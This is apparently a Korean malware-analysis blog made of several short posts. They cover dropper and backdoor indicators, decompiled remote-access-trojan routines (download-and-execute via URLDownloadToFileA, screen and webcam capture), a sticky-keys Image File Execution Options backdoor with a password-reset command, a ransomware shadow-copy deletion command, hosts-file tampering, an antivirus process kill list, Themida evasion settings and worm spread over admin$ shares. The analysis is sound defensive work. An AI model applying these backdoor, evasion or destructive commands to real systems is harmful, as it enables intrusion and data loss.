IE9 호환성보기 목록 URL
- http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
| PEiD Signatures (0) | 2016.07.28 |
|---|---|
| Packed.Dropper.PE (0) | 2016.07.27 |
| [로컬 백도어] Image file execution option (0) | 2016.06.21 |
| GenPack:Trojan.Generic (0) | 2016.06.21 |
| CryptXXX Decryptor (0) | 2016.06.21 |
http://handlers.sans.org/jclausing/userdb.txt
http://reverse-engineering-scripts.googlecode.com/files/UserDB.TXT
http://research.pandasecurity.com/blogs/images/userdb.txt
https://raw.githubusercontent.com/guelfoweb/peframe/5beta/peframe/signatures/userdb.txt #
pypeid > https://github.com/libcrack/python-peid
pefile > https://github.com/erocarrera/pefile
- 내장된 peutils는 3.x버전이다. 2.x버전을 사용하기위해서는 peutils만 아래 파일로 import
- python 2.7 > https://github.com/hiddenillusion/AnalyzePE/blob/master/peutils.py
| IE9 호환성보기 목록 (0) | 2016.08.03 |
|---|---|
| Packed.Dropper.PE (0) | 2016.07.27 |
| [로컬 백도어] Image file execution option (0) | 2016.06.21 |
| GenPack:Trojan.Generic (0) | 2016.06.21 |
| CryptXXX Decryptor (0) | 2016.06.21 |
악성코드 정보.1
- 종류 : Packed.Backdoor.PE(1)
- md5 : 259c82d6db2883dd135c87b0feb44069
☞ 악성코드의 C&C 접속
- IP: 190.185.124.125, Port:443
- IP: 202.137.244.198, Port:443
- IP: 220.132.191.110, Port:443
악성코드 정보.2
- 종류 : Packed.Dropper.PE
- md5 : 036bae8dd72bd70761960a90ea631ff1
☞ 악성코드 드랍경로
- %USERPROFILE%\AppData\Local\\Microsoft\Office\15.0\msoia.exe /update
- 종류 : Packed.Backdoor.PE(2)
- md5 : 133a436ddb128520d5061e020f09cb16
☞ 드랍된 악성코드 복제경로
- %USERPROFILE%\AppData\Local\Microsoft\Internet Explorer\IECompatData\ielowutil.exe /autostart
- 종류 : Packed.Backdoor.PE(2)
- md5 : 133a436ddb128520d5061e020f09cb16
☞ 드랍된 악성코드의 C&C 접속
- IP: 190.185.124.125, Port:443
- IP: 202.137.244.198, Port:443
- IP: 220.132.191.110, Port:443
| IE9 호환성보기 목록 (0) | 2016.08.03 |
|---|---|
| PEiD Signatures (0) | 2016.07.28 |
| [로컬 백도어] Image file execution option (0) | 2016.06.21 |
| GenPack:Trojan.Generic (0) | 2016.06.21 |
| CryptXXX Decryptor (0) | 2016.06.21 |
Image file execution option
레지스트리 경로
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image file execution options
sethc.exe > cmd.exe //StickyKeys (SHIFT 키를 5번 연속 클릭 시 실행, system32\sethc.exe)
utilman.exe > cmd.exe //접근성 표시(system32\utilman.exe)
부팅 후 로그인 화면
StickyKey(sethc.exe) 및 접근성 표시(utilman.exe) 실행 시 cmd.exe가 실행
cmd 실행 후
net user administrator <password>
*StickyKeys 기능해제
Accessibility Options > Keyboard > Settings > Use shotcut(disable)
| PEiD Signatures (0) | 2016.07.28 |
|---|---|
| Packed.Dropper.PE (0) | 2016.07.27 |
| GenPack:Trojan.Generic (0) | 2016.06.21 |
| CryptXXX Decryptor (0) | 2016.06.21 |
| Malware Classification (0) | 2016.06.21 |
MD5 : deaf01d9625d4104dbdc00eba37d7fc0
사용자 시스템 정보 수집
GetComputerNameA(&Buffer, &nSize) GetVersionExA(&VersionInformation) GlobalMemoryStatus((LPMEMORYSTATUS)&v15)
종료 및 재부팅
case 0x1000001:
sub_300A70("SetShutdownPrivilege",1);
ExitWindowsEx(0xCu, 0);
break;
case 0x1000002:
sub_300A70("SetShutdownPrivilege",1);
ExitWindowsEx(0x6u, 0);
break;
case 0x1000003:
sub_300A70("SetShutdownPrivilege",1);
ExitWindowsEx(0x4u, 0);
break;
파일 다운로드 및 실행
wsprintfA(&v8, "abcdefg.exe");
GetTemppathA(0x104u, &CmdLine);
strcat(&CmdLine, "\\")
strcat(&CmdLine, &v8);
v1 = LoadLibraryA("urlmon.dll");
v2 = GetProcAddress(v1, "URLDownloadToFileA");
......
return WinExec(&CmdLine, 5u)
키보드/마우스 이벤트 API를 호출하여 제어
case 0x10000011:
sub_300120(&v32);
keybd_event(X[0], 0, 0, 0);
sub_300170(&v32);
break;
case 0x10000012:
sub_300120(&v28);
keybd_event(X[0], 0, 2u, 0);
sub_300170(&v28);
break;
case 0x10000013:
sub_300120(&v30);
SetCursorPos(*(int *)X, Y);
sub_300170(&v30);
break;
case 0x10000014:
sub_300120(&v24);
mouse_event(2u, 0, 0, 0, 0);
sub_300170(&v24);
break;
case 0x10000015:
sub_300120(&v27);
mouse_event(4u, 0, 0, 0, 0);
sub_300170(&v27);
break;
PC화면 스크린샷
CreateDC 함수 호출 후 전체 화면 DC 생성
CreateCompatibleDC 함수 호출 후 만들어진 전체 화면 DC를 호환되는 메모리 DC로 생성
CreateCompatibleBitmap 함수 호출 후 비트맵을 생성
BitBlt 함수를 호출 해서 메모리 DC에 화면 DC를 복사v1 = this;
v2 = CreateDCA("DISPLAY", 0, 0, 0);
v3 = v2;
v4 = CreateCompatibleDC(v2);
v5 = v4;
v6 = v4;
v7 = CreateCompatibleBitmap(v3, *((_DWORD *)v1 + 5), *((_DWORD *)v1 + 6));
SelectObject(v5, v7);
BitBlt(v5, 0, 0, *((_DWORD *)v1 + 5), *((_DWORD *)v1 + 6), v3, 0, 0, 0xCC0020u);
............
GetDIBits(v6, v7, 0, *((_DWORD *)v1 + 6), (LPVOID)(*((_DWORD *)v1 + 1) + *((_DWORD *)v1 + 4)), (LPBITMAPINFO)v10, 0);
DeleteDC(v6);
DeleteDC(v3);
return DeleteObject(v7);
캠 도청
capCreateCaptureWindow 함수 호출 후 캡쳐 윈도우를 생성
C&C 서버에서 capDrivaerConnec 함수 호출 후 캡쳐 드라이브와 캡쳐 윈도우를 연결
v2 = CreateWindowExA(0, "#11220", WindowName, 0x80000000u, 0, 0, 0, 0, 0, 0, 0, 0);
*(_DWORD *)(v1 + 12) = v2;
*(_DWORD *)(v1 + 16) = capCreateCaptureWindowa("CVideoCap", 1342177280, 0, 0, 0, 0, v2, 0);
| Packed.Dropper.PE (0) | 2016.07.27 |
|---|---|
| [로컬 백도어] Image file execution option (0) | 2016.06.21 |
| CryptXXX Decryptor (0) | 2016.06.21 |
| Malware Classification (0) | 2016.06.21 |
| Hosts 변조 (0) | 2016.06.20 |
Decrypted: Kaspersky releases free decryptor for CryptXXX Ransomware
출처 : http://www.bleepingcomputer.com/news/security/decrypted-kaspersky-releases-free-decryptor-for-cryptxxx-ransomware/
| [로컬 백도어] Image file execution option (0) | 2016.06.21 |
|---|---|
| GenPack:Trojan.Generic (0) | 2016.06.21 |
| Malware Classification (0) | 2016.06.21 |
| Hosts 변조 (0) | 2016.06.20 |
| Anti-AV 센스 (0) | 2016.06.20 |
갓모드[GodMode, CVE-2014-6332]
CVE-2014-6332 취약점은 윈도 OLE(Object Linking and Embedding) 자동화 배열 원격코드 실행 취약점으로,
인터넷 익스플로러(Internet Explorer, 이하 IE)가 OLE 객체를 처리하는 과정에서 원격으로 코드를 실행하는 취약점이다.
이 취약점은 IE의 VBScript 엔진에서 배열의 크기를 재설정하는 과정에서 충분한 에러 처리를 수행하지 않아 발생한다.
배열의 크기를 재설정할 때 배열의 크기를 저장하고 있는 변수를 새로운 값으로 갱신하는데,
배열을 할당하는 과정에서 에러가 발생한 경우 이전 값으로 되돌리지 않는다.
따라서 초기 배열의 영역 이외의 메모리를 읽고, 쓰고, 접근하는 것이 가능하게 된다.
참고 : http://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?curPage=1&menu_dist=2&seq=23225
실버라이트 취약점 [CVE-2013-0074]
참고 : http://hummingbird.tistory.com/5406
플래시 취약점 [CVE-2014-0515]
참고 : http://hacklab.kr/?p=203
IP 체크
'http://checkip.dyndns.org/' 접속을 통한 공인IP 체크
PE 내장
악성코드에 securityxploded에서 제작된 툴을 내장하여 정보수집에 활용
http://securityxploded.com/download.php#exescan
랜섬웨어 - 볼륨 섀도 카피 삭제
악성코드는 ‘vssadmin.exe Delete Shadows/All/Quiet‘
명령을 실행하여 볼륨 섀도 카피를 삭제한다.
이 경우 윈도 운영체제에서 제공하는 파일 백업 및 복원 기능을 정상적으로 이용할 수 없다.
이 명령은 CryptLocker류에서 공통적으로 확인할 수 있는 기능이다.
시작프로그램 레지스트리
HKCU\Software\Microsoft\Windows\CureentVersion\Run\
시스템 디렉토리
%SystemRoot%\
%SystemRoot%\system\
%SystemRoot%\system32\
%SystemRoot%\system32\
%SystemRoot%\system32\dllcache
%SystemRoot%\system32\drivers
%SystemRoot%\SysWOW64\
%SystemRoot%\SysWOW64\dllcache
%SystemRoot%\SysWOW64\drivers
SysWOW64는 64비트 시스템에서만 존재하는 폴더로 32비트와의 호환성을 위해 존재하는 폴더이다.
“%SystemRoot%\system32\” 폴더에 64비트 시스템 파일이 위치한다면 “%SystemRoot%\SysWOW64\”에는 32비트 시스템 파일이 위치한다.
따라서, 64비트 시스템에서는 2개의 폴더를 모두 조사할 필요가 있다.
사용자 디렉토리
사용자 데이터 디렉토리
%UserProfile%\AppData\
%UserProfile%\AppData\Local\(%LocalAppData%)
%UserProfile%\AppData\LocalLow\
%UserProfile%\AppData\Roaming\(%AppData%)
%SystemDrive%\ProgramData\(%AllUsersProfile%)
휴지통 디렉토리
%SystemDrive%\$Recycle.Bin\
사용자볼륨 디렉토리
%SystemDrive%\System Volume Information\
임시 디렉토리
%UserProfile%\AppData\Local\Temp = %Temp%
%SystemRoot%\Temp\
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\
웹브라우저 다운로드 디렉토리
%UserProfile%\Downloads
%UserProfile%\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\
%SystemRoot\Downloaded Program Files //Active X
알려진 디렉토리
%SystemDrive%\HNC
기타 디렉토리
%AppData%\Microsoft\Windows\Start Menu\Programs\Startup
%SystemDrive%\Program Files\Common Files\ = %CommonProgramFiles%
%SystemDrive%\Program Files (x86)\Common Files\ = %CommonProgramFiles(x86)%
%UserProfile%
(=%HomePath%)
%Windir%
%LocalAppdata%
%Public%
%SystemRoot%
%Temp%
(=%TMP%)
| GenPack:Trojan.Generic (0) | 2016.06.21 |
|---|---|
| CryptXXX Decryptor (0) | 2016.06.21 |
| Hosts 변조 (0) | 2016.06.20 |
| Anti-AV 센스 (0) | 2016.06.20 |
| W32.Madangel (0) | 2016.04.07 |
웹사이트 참조 우선순위
- 로컬시스템의 DNS Cache 정보
- hosts.ics(internet connection sharing)
- hosts
- DNS
C:\Windows\System32\Drivers\etc\hosts 파일 변조
C:\Windows\System32\Drivers\etc\hosts.ics 생성
윈도우에서 캐시 초기화 ipconfig/flushdns, 수동 맵핑파일 {SystemDir}\drivers\etc\hosts
윈도우에서 캐시 리스트 확인 ipconfig/displaydns
리눅스(유닉스)에서는 기본적으로 dns 캐시를 사용하지 않는다. /etc/init.d/nscd restart (password/group/hosts캐시 초기화), 수동 맵핑파일 etc/hosts
MacOS X 10.4 이전 캐시 초기화 lookupd -flushdns, 수동 맵핑파일/etc/hosts
MacOS X 10.5 이후 캐시 초기화 dnscacheutil -flushdns, 수동 맵핑파일 /etc/hosts
익스플로어에서 DNS 캐시설정
https://support.microsoft.com/ko-kr/kb/263558
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
값 이름: DnsCacheTimeout
데이터 형식: REG_DWORD
단위: 10진수
값: (초 단위 시간)
값 이름: ServerInfoTimeOut
데이터 형식: REG_DWORD
단위: 10진수
값: (초 단위 시간)
파이어폭스에서 DNS 캐시설정
about:config 접속
network.dnsCacheEntries (캐시 항목 개수),
network.dnsCacheExpiration (캐시 기간, 단위: 초) 두 항목을 변경하거나 새로 추가한다.
entry 개수가 0이 되면 캐시를 전혀 하지 않는다. 복잡한 웹사이트 로딩시 속도 저하가 발생할 수 있다.
호스트 변조 바이러스 중 '파밍 악성코드'는 드라이브 바이 다운로드 공격을 주로 이용하며
Java,Flash,IE등의 취약점을 대다수 이용하는 다동 스크립트(Dadong's Script), 공다팩(Gongda Exploit Pack)등이 주를 이룬다.
| GenPack:Trojan.Generic (0) | 2016.06.21 |
|---|---|
| CryptXXX Decryptor (0) | 2016.06.21 |
| Malware Classification (0) | 2016.06.21 |
| Anti-AV 센스 (0) | 2016.06.20 |
| W32.Madangel (0) | 2016.04.07 |
Anti-AV 대상 프로세스
V3 Lite
V3LRun.exe
V3LTray.exe
V3LSvc.exe
V3 Internet Security
V3Up.exe
V3SP.exe
Mupdate2.exe
V3SVC.exe
SiteGuard
sgsvc.exe
sgui.exe
sgrun.exe
ASP
MYSFTY.exe
Online Security
Aosrts.exe
Antivir
avgnt.exe
avcenter.exe
avguard.exe
avscan.exe
avupgsvc.exe
avwsc.exe
Avast
avastsvc.exe
ashupd.exe
avastui.exe
AVG
avgam.exe
avgemc.exe
avgnsx.exe
avgrsx.exe
avgfrw.exe
avgwdsvc.exe
avgupd.exe
BitDefender
updatesrv.exe
seccenter.exe
bdagent.exe
bdagent.exe
bdreinit.exe
Eset
egui.exe
ekrn.exe
Kaspersky
Avp.exe
McAfree
shstat.exe
updaterui.exe
mctray.exe
MSE
msseces.exe
Symantec Norton
ccsvchst.exe
navw32.exe
Telus
vsserv.exe
Naver AV
NSVMon.npc
Nsavsvc.npc
NaverAgent.exe
Alyac
AYRTSRV.aye
AYupdsrv.aye
ayagent.aye
===================================
더미다를 이용한 백신우회 옵션
Protection Option
Anti-Debugger Detection - Ultra
Advanced API-Wrapping - Level2
Anti-Dumpers - Enable Protection
Anti-Patching - none
Entry Point Obfuscation - Enable Protection
Metamorph Security - Enable Protection
Resources Encryption - Disenable Protection
Memory Guard - Enable Protection
Monitor Blocker - Enable Enable
VMWare/VirtualPC - Compatible
When Dubugger Found : Crash App
Advanced Option
Encrypt Applications - Enable
.NET Assembles Checks - Enable
Protect as DLL Plugin - DisEnable
Active Context - DisEnable
Hide from PE scanners - Standard
Localization - English
Add Manifest - Don't add..
Splash screen settings - Display..
| GenPack:Trojan.Generic (0) | 2016.06.21 |
|---|---|
| CryptXXX Decryptor (0) | 2016.06.21 |
| Malware Classification (0) | 2016.06.21 |
| Hosts 변조 (0) | 2016.06.20 |
| W32.Madangel (0) | 2016.04.07 |
W32.Madangel은 감염형 악성코드(웜)이다.
실행되면 다음과 같은 작업을 수행한다.
%Windir%\rundl132.exe //자기복사(W32.Madangel) %Windir%\Logo1_.exe //자기복사(W32.Madangel) %Windir%\vDll.dll //다운로드더 생성
참고: %CurrentFolder% 악성코드가 실행된 디렉토리의 환경변수 %System% 시스템 디렉토리의 환경변수 C:\Windows\System (Windows 95/98/Me) C:\Winnt\System32 (Windows NT/2000) C:\Windows\System32 (Windows XP)
system system32 windows Documents and Settings System Volume Information Recycled winnt Program Files Windows NT WindowsUpdate Windows Media Player Outlook Express Internet Explorer ComPlus Applications NetMeeting Common Files Messenger Microsoft Office InstallShield Installation Information MSN Microsoft Frontpage Movie Maker MSN Gaming Zone
다음 IP주소로 "Hello,World" 문자열을 포함한 ICMP 패킷을 보낼 수 있다.
192.168.0.30
또한, 감염된 컴퓨터의 IP주소와 동일한 범위의 IP주소로 ICMP 패킷을 전송할 수 있다.
PC가 ICMP에 응답하는 경우 기본 공유폴더에 접근 시도를 한다.
\\ipc$
\\admin$
프로세스는 로컬 네트워크에있는 모든 컴퓨터와 공유 폴더를 접근 시도를 한다.
사용자계정과 암호를 사용하지 않거나 암호를 사용하지 않는 계정의 공유폴더를 열었을 경우
공유폴더에 존재하는 모든.exe파일을 감염시킨다
| GenPack:Trojan.Generic (0) | 2016.06.21 |
|---|---|
| CryptXXX Decryptor (0) | 2016.06.21 |
| Malware Classification (0) | 2016.06.21 |
| Hosts 변조 (0) | 2016.06.20 |
| Anti-AV 센스 (0) | 2016.06.20 |
packed.zip